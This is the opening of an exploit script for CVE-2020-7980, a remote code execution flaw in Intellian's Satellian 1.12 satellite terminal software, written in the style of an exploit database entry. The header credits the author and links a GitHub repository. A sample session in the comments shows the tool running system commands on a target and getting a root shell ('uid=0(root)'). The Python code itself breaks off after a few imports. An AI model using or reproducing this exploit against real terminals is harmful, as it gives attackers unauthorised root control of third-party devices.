# Exploit Title: Satellian 1.12 - Remote Code Execution # Date: 2020-01-28 # Exploit Author: Xh4H # Vendor Homepage: https://www.intelliantech.com/?lang=en # Version: v1.12+ # Tested on: Kali linux, MacOS # CVE : CVE-2020-7980 # Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980 # xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted> # ________________________________________ # (__) / \ # (oo) ( Intellian Satellite Terminal PoC ) # /-------\/ --' \________________________________________/ # / | || # * ||----|| # Performing initial scan. Listing available system binaries. # Starting request to http://<redacted> # Executing command /bin/ls /bin # acu_server # acu_tool # addgroup # adduser # ... # Satellian $ id # uid=0(root) gid=0(root) import requests import argparse import sys import calendar imp...